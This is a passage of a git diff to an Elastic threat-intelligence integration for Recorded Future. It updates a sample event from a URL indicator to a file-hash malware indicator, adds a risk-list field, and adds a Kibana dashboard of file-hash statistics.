Most recent link (Jul 10, 2021): https://app.recordedfuture.com/live/sc/1GnDrn8zigTd", + "EvidenceString": "3 sightings on 3 sources: Polyswarm Sandbox Analysis, Recorded Future Triage Malware Analysis, PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "recentAnalystNote", - "Rule": "Recently Reported by Insikt Group", + "Name": "positiveMalwareVerdict", + "Rule": "Positive Malware Verdict", + "SightingsCount": 3, "Sources": [ - "VKz42X" + "source:hzRhwZ", + "source:ndy5_2", + "source:doLlw5" ], - "Timestamp": "2021-07-10T00:00:00.000Z" + "SourcesCount": 3, + "Timestamp": "2024-03-23T16:36:02.000Z" } ], - "name": "http://144.34.179.162/a", - "risk_string": "2/24" + "name": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", + "risk_string": "2/17" }, "tags": [ "forwarded", @@ -103,21 +88,17 @@ "name": "Recorded Future" }, "indicator": { + "file": { + "hash": { + "sha256": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f" + } + }, "provider": [ - "Ars Technica", - "fook.news", - "urdupresss.com", - "HackDig Posts", - "apple.news", - "Insikt Group" + "PolySwarm", + "Polyswarm Sandbox Analysis", + "Recorded Future Triage Malware Analysis" ], - "type": "url", - "url": { - "domain": "144.34.179.162", - "original": "http://144.34.179.162/a", - "path": "/a", - "scheme": "http" - } + "type": "file" } } -} +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/docs/README.md b/packages/ti_recordedfuture/docs/README.md index b148377f608..4418a453511 100644 --- a/packages/ti_recordedfuture/docs/README.md +++ b/packages/ti_recordedfuture/docs/README.md 
@@ -23,13 +23,13 @@ An example event for `threat` looks as following: ```json { - "@timestamp": "2023-08-29T13:05:30.615Z", + "@timestamp": "2024-03-29T13:00:04.736Z", "agent": { - "ephemeral_id": "4d3f7527-f999-48d2-920c-3ec5a0b34414", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "fe05693b-59ec-47c6-9d5e-b0ef7c71ee65", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_recordedfuture.threat", @@ -40,9 +40,9 @@ An example event for `threat` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -50,9 +50,9 @@ An example event for `threat` looks as following: "threat" ], "dataset": "ti_recordedfuture.threat", - "ingested": "2023-08-29T13:05:31Z", + "ingested": "2024-03-29T13:00:14Z", "kind": "enrichment", - "risk_score": 87, + "risk_score": 75, "timezone": "+00:00", "type": [ "indicator" 
@@ -63,60 +63,45 @@ An example event for `threat` looks as following: }, "log": { "file": { - "path": "/tmp/service_logs/rf_url_default.csv" + "path": "/tmp/service_logs/rf_file_default.csv" }, - "offset": 45 + "offset": 57 }, "recordedfuture": { "evidence_details": [ { - "Criticality": 1, - "CriticalityLabel": "Unusual", - "EvidenceString": "66 sightings on 22 sources including: Ars Technica, fook.news, urdupresss.com, HackDig Posts, apple.news. Most recent link (Jul 20, 2021): https://techsecuritenews.com/solarwinds-pirates-utilisent-nouvelle-faille-zero-day-attaques/", + "Criticality": 2, + "CriticalityLabel": "Suspicious", + "EvidenceString": "2 sightings on 1 source: PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "defangedURL", - "Rule": "Historically Reported as a Defanged URL", + "Name": "linkedToMalware", + "Rule": "Linked to Malware", + "SightingsCount": 2, "Sources": [ - "Ctq", - "idn:fook.news", - "idn:urdupresss.com", - "POs2u-", - "idn:apple.news", - "idn:cryptoinfoos.com.ng", - "g9rk5F", - "idn:thewindowsupdate.com", - "idn:nationalcybersecuritynews.today", - "gBDK5G", - "idn:microsoft.com", - "idn:techsecuritenews.com", - "idn:mblogs.info", - "J6UzbO", - "idn:viralamo.com", - "idn:sellorbuyhomefast.com", - "idn:crazyboy.tech", - "idn:times24h.com", - "idn:buzzfeeg.com", - "idn:dsmenders.com", - "WroSbs", - "idn:vzonetvgh.com" + "source:doLlw5" ], - "Timestamp": "2021-07-20T00:00:00.000Z" + "SourcesCount": 1, + "Timestamp": "2024-03-23T17:10:20.642Z" }, { "Criticality": 3, "CriticalityLabel": "Malicious", - "EvidenceString": "1 sighting on 1 source: Insikt Group. 1 report: SolarWinds Fixes Critical Vulnerability in Serv-U Managed File Transfer and Secure FTP Products. 
Most recent link (Jul 10, 2021): https://app.recordedfuture.com/live/sc/1GnDrn8zigTd", + "EvidenceString": "3 sightings on 3 sources: Polyswarm Sandbox Analysis, Recorded Future Triage Malware Analysis, PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "recentAnalystNote", - "Rule": "Recently Reported by Insikt Group", + "Name": "positiveMalwareVerdict", + "Rule": "Positive Malware Verdict", + "SightingsCount": 3, "Sources": [ - "VKz42X" + "source:hzRhwZ", + "source:ndy5_2", + "source:doLlw5" ], - "Timestamp": "2021-07-10T00:00:00.000Z" + "SourcesCount": 3, + "Timestamp": "2024-03-23T16:36:02.000Z" } ], - "name": "http://144.34.179.162/a", - "risk_string": "2/24" + "name": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", + "risk_string": "2/17" }, "tags": [ "forwarded", @@ -127,25 +112,20 @@ An example event for `threat` looks as following: "name": "Recorded Future" }, "indicator": { + "file": { + "hash": { + "sha256": "63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f" + } + }, "provider": [ - "Ars Technica", - "fook.news", - "urdupresss.com", - "HackDig Posts", - "apple.news", - "Insikt Group" + "PolySwarm", + "Polyswarm Sandbox Analysis", + "Recorded Future Triage Malware Analysis" ], - "type": "url", - "url": { - "domain": "144.34.179.162", - "original": "http://144.34.179.162/a", - "path": "/a", - "scheme": "http" - } + "type": "file" } } } - ``` **Exported fields** 
@@ -205,6 +185,7 @@ An example event for `threat` looks as following:
 | log.offset | Offset of the entry in the log file. | long |
 | message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text |
 | recordedfuture.evidence_details | List of sightings used as evidence for this indicator. | flattened |
+| recordedfuture.list | User-configured risklist. | keyword |
 | recordedfuture.name | Indicator value. | keyword |
 | recordedfuture.risk_string | Details of risk rules observed. | keyword |
 | tags | List of keywords used to tag each event. | keyword |
diff --git a/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml b/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml
index 732eee6f63f..84c55ff957c 100644
--- a/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml
+++ b/packages/ti_recordedfuture/elasticsearch/transform/latest_ioc/fields/fields.yml
@@ -28,3 +28,8 @@
 description: >
 Details of risk rules observed.
+ - name: list
+ type: keyword
+ description: >
+ User-configured risklist.
+
diff --git a/packages/ti_recordedfuture/img/rf-files.png b/packages/ti_recordedfuture/img/rf-files.png
new file mode 100644
index 00000000000..7699f472f66
Binary files /dev/null and b/packages/ti_recordedfuture/img/rf-files.png differ
diff --git a/packages/ti_recordedfuture/img/rf-overview.png b/packages/ti_recordedfuture/img/rf-overview.png
new file mode 100644
index 00000000000..7c91dc1836c
Binary files /dev/null and b/packages/ti_recordedfuture/img/rf-overview.png differ
diff --git a/packages/ti_recordedfuture/img/rf-urls.png b/packages/ti_recordedfuture/img/rf-urls.png
new file mode 100644
index 00000000000..aac8fd838f0
Binary files /dev/null and b/packages/ti_recordedfuture/img/rf-urls.png differ
diff --git a/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b.json b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b.json
new file mode 100644
index 00000000000..c40b2d4d5a3
--- /dev/null
+++ b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b.json
@@ -0,0 +1,1135 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"b7f6f99b-95d3-44ab-b935-704e307e0dd8\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"b7f6f99b-95d3-44ab-b935-704e307e0dd8\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Provider\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"6f1ca1c9-a281-458e-bdcf-b21e67546c34\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6f1ca1c9-a281-458e-bdcf-b21e67546c34\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"50fee1f5-9c14-4620-9c75-f3b91fc6b39f\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"50fee1f5-9c14-4620-9c75-f3b91fc6b39f\",\"fieldName\":\"recordedfuture.list\",\"title\":\"Risk List\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Dashboard providing statistics about file type indicators from the RecordedFuture integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": [ + "ti_recordedfuture.threat" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.dataset": "ti_recordedfuture.threat" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": 
"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "file" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "file" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n[RecordedFuture Overview](/app/dashboards#/view/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b) \n**[RecordedFuture Files (This Page)](/app/dashboards#/view/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b)** \n[RecordedFuture URLs](/app/dashboards#/view/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3) \n\n[Integrations 
Page](/app/integrations/detail/ti_recordedfuture/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: file**.\n\nThe dashboard is made to provide general statistics and show the health of your indicators like hash type counters, popular domains, statistics about how many unique indicators are ingested and other relevant information.", + "openLinksInNewTab": false + }, + "title": "Files Navigation Textbox [Logs AbuseCH]", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 46, + "i": "ee21d28f-11b0-46ad-b30a-4aff51453a32", + "w": 7, + "x": 0, + "y": 0 + }, + "panelIndex": "ee21d28f-11b0-46ad-b30a-4aff51453a32", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b83c382d-fab9-4e60-a632-475e221cc20c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b83c382d-fab9-4e60-a632-475e221cc20c": { + "columnOrder": [ + "eda3c6d9-dacb-4e5e-b977-50104f76e91a" + ], + "columns": { + "eda3c6d9-dacb-4e5e-b977-50104f76e91a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique MD5", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.md5" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "b83c382d-fab9-4e60-a632-475e221cc20c", + "layerType": "data", + "metricAccessor": "eda3c6d9-dacb-4e5e-b977-50104f76e91a" + } + }, + "title": "Unique MD5 [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "5aa8cc45-eafb-423a-be69-330e1c9e915f", + "w": 8, + "x": 7, 
+ "y": 0 + }, + "panelIndex": "5aa8cc45-eafb-423a-be69-330e1c9e915f", + "title": "Unique MD5 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-85ad73b3-3b76-49f1-ad20-6256b58918f8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "85ad73b3-3b76-49f1-ad20-6256b58918f8": { + "columnOrder": [ + "289bd005-bdd2-4f3b-83b9-ad6ae52a9ed3" + ], + "columns": { + "289bd005-bdd2-4f3b-83b9-ad6ae52a9ed3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA1", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha1" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "85ad73b3-3b76-49f1-ad20-6256b58918f8", + "layerType": "data", + "metricAccessor": "289bd005-bdd2-4f3b-83b9-ad6ae52a9ed3" + } + }, + "title": "Unique SHA1 [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "2e7f1b1e-7c0d-4f0e-b5a3-75f3558b7b23", + "w": 8, + "x": 15, + "y": 0 + }, + "panelIndex": "2e7f1b1e-7c0d-4f0e-b5a3-75f3558b7b23", + "title": "Unique SHA1 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-49b7070a-f1d3-46e1-a980-2f6d6d130167", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "49b7070a-f1d3-46e1-a980-2f6d6d130167": { + "columnOrder": [ + "b6c5e221-88ff-490e-bd3e-188b3e0dd1f4" + ], + "columns": { + "b6c5e221-88ff-490e-bd3e-188b3e0dd1f4": { + 
"customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA256", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha256" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "49b7070a-f1d3-46e1-a980-2f6d6d130167", + "layerType": "data", + "metricAccessor": "b6c5e221-88ff-490e-bd3e-188b3e0dd1f4" + } + }, + "title": "Unique SHA256 [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "82bffa7f-9796-4815-9256-0cc1d5d89096", + "w": 9, + "x": 23, + "y": 0 + }, + "panelIndex": "82bffa7f-9796-4815-9256-0cc1d5d89096", + "title": "Unique SHA256 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "12768311-834b-48d5-8aad-d17d139c2ae5": { + "columnOrder": [ + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + ], + "columns": { + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA384", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha384" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "12768311-834b-48d5-8aad-d17d139c2ae5", + "layerType": "data", + "metricAccessor": "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + } + }, + "title": "Unique TLSH [Logs AbuseCH]", + "type": "lens", 
+ "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "6d782218-5709-4ead-b236-21ffcc4c207d", + "w": 8, + "x": 32, + "y": 0 + }, + "panelIndex": "6d782218-5709-4ead-b236-21ffcc4c207d", + "title": "Unique SHA384 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "12768311-834b-48d5-8aad-d17d139c2ae5": { + "columnOrder": [ + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + ], + "columns": { + "0255894e-dd88-4eb1-b21b-0cccecb2cd1b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA512", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha512" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "12768311-834b-48d5-8aad-d17d139c2ae5", + "layerType": "data", + "metricAccessor": "0255894e-dd88-4eb1-b21b-0cccecb2cd1b" + } + }, + "title": "Unique TLSH [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "58bb203c-031b-4620-9d66-e4368c65ab52", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "58bb203c-031b-4620-9d66-e4368c65ab52", + "title": "Unique SHA512 [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + } + ], + 
"state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8": { + "columnOrder": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054", + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "columns": { + "06b603cb-c9fb-493a-9ca4-e6502ca12054": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.md5\" : *" + }, + "label": "MD5" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha1\" : *" + }, + "label": "SHA1" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha256\" : *" + }, + "label": "SHA256" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha384\" : *" + }, + "label": "SHA384" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha512\" : *" + }, + "label": "SHA512" + } + ] + }, + "scale": "ordinal" + }, + "de0e531b-dda7-461f-9783-3ab9267d202e": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "layerId": "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "06b603cb-c9fb-493a-9ca4-e6502ca12054" + } + ], + "legend": { + "isVisible": 
true, + "position": "right" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "File Types [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "fb5eda7b-02e2-4932-bd84-4213cad36a34", + "w": 15, + "x": 7, + "y": 8 + }, + "panelIndex": "fb5eda7b-02e2-4932-bd84-4213cad36a34", + "title": "Top File Hash Types [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8": { + "columnOrder": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054", + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "columns": { + "06b603cb-c9fb-493a-9ca4-e6502ca12054": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.md5\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha1\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha256\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha384\" : *" + }, + "label": "" + }, + { + "input": { + "language": "kuery", + "query": "\"threat.indicator.file.hash.sha512\" : *" + }, + "label": "" + } + ] + }, + "scale": "ordinal" + }, + "de0e531b-dda7-461f-9783-3ab9267d202e": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": 
"ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 5, + "legendSize": "auto", + "metrics": [ + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054" + ], + "truncateLegend": false + } + ], + "shape": "donut" + } + }, + "title": "File Types [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "aad523d7-62c8-42c2-ac5d-76705ffe08d4", + "w": 26, + "x": 22, + "y": 8 + }, + "panelIndex": "aad523d7-62c8-42c2-ac5d-76705ffe08d4", + "title": "Top File Hash Types [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-689075f1-c5a1-480f-bb28-0e2f1e9a69b5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "689075f1-c5a1-480f-bb28-0e2f1e9a69b5": { + "columnOrder": [ + "6661c10a-7e9e-4192-9df6-68639da17c8e", + "79efdebd-bbd4-4971-b889-064a9a9a0420" + ], + "columns": { + "6661c10a-7e9e-4192-9df6-68639da17c8e": { + "dataType": "string", + "isBucketed": true, + "label": "event.risk_score", + "operationType": "range", + "params": { + "maxBars": 499.5, + "parentFormat": { + "id": "range", + "params": { + "replaceInfinity": true, + "template": "arrow_right" + } + }, + "ranges": [ + { + "from": 0, + "label": "0-50", + "to": 50 + }, + { + "from": 50, + "label": "50-60", + "to": 60 + }, + { + "from": 60, + "label": "60-70", + "to": 70 + }, + { + "from": 
70, + "label": "70-80", + "to": 80 + }, + { + "from": 80, + "label": "80-90", + "to": 90 + }, + { + "from": 90, + "label": "90-100", + "to": 100 + } + ], + "type": "range" + }, + "scale": "ordinal", + "sourceField": "event.risk_score" + }, + "79efdebd-bbd4-4971-b889-064a9a9a0420": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "79efdebd-bbd4-4971-b889-064a9a9a0420" + ], + "layerId": "689075f1-c5a1-480f-bb28-0e2f1e9a69b5", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "6661c10a-7e9e-4192-9df6-68639da17c8e", + "yConfig": [ + { + "color": "#6092c0", + "forAccessor": "79efdebd-bbd4-4971-b889-064a9a9a0420" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "92307cac-1296-483d-a825-712e98617f14", + "w": 15, + "x": 7, + "y": 27 + }, + "panelIndex": "92307cac-1296-483d-a825-712e98617f14", + "title": "Indicators by Risk Score [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + 
"attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8": { + "columnOrder": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054", + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "columns": { + "06b603cb-c9fb-493a-9ca4-e6502ca12054": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of threat.indicator.file.hash.md5", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "de0e531b-dda7-461f-9783-3ab9267d202e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.file.hash.md5" + }, + "de0e531b-dda7-461f-9783-3ab9267d202e": { + "dataType": "number", + 